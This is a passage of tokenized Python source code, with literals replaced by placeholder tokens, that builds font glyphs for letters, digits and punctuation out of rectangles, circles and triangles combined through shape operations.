<NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:h>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:I>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:i>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.0> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT:0.0> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:k>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:L>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:l>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:M>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:m>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:N>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:n>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:O>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:o>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:P>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:p>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0.5> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT:0.5> , <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:q>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:R>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:r>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += reflect_x ( reflect_y ( shape , <NUM_LIT:0.5> ) , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:S>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= scale_x ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += reflect_x ( reflect_y ( shape , <NUM_LIT> ) , <NUM_LIT> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:s>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) + rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:T>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:t>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:u>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:v>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:w>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:X>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:x>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:Y>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) + move ( reflect_x ( shape , <NUM_LIT> ) , - <NUM_LIT> , - <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:y>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:z>' ] = shape <EOL> shape = MathTree . Constant ( <NUM_LIT:1> ) <EOL> shape . bounds = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , None , None , None ] <EOL> shape . shape = True <EOL> shape . width = <NUM_LIT> <EOL> shape . xmin , shape . xmax = <NUM_LIT:0> , <NUM_LIT> <EOL> shape . ymin , shape . ymax = <NUM_LIT:0> , <NUM_LIT:1> <EOL> _glyphs [ '<STR_LIT:U+0020>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT> , <NUM_LIT:3> ) <EOL> shape &= rectangle ( <NUM_LIT:0.0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , - <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:U+002C>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:.>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.1> <EOL> _glyphs [ "<STR_LIT:'>" ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) + rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:">' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) + circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT::>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT> , <NUM_LIT:3> ) <EOL> shape &= rectangle ( <NUM_LIT:0.0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , - <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:;>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.1> <EOL> _glyphs [ '<STR_LIT:!>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:->' ] = shape <EOL> shape = circle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> ) , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:)>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:(>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= circle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:1>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:2>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:3>' ] = shape <EOL> shape = triangle ( - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:4>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:5>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - scale_y ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , 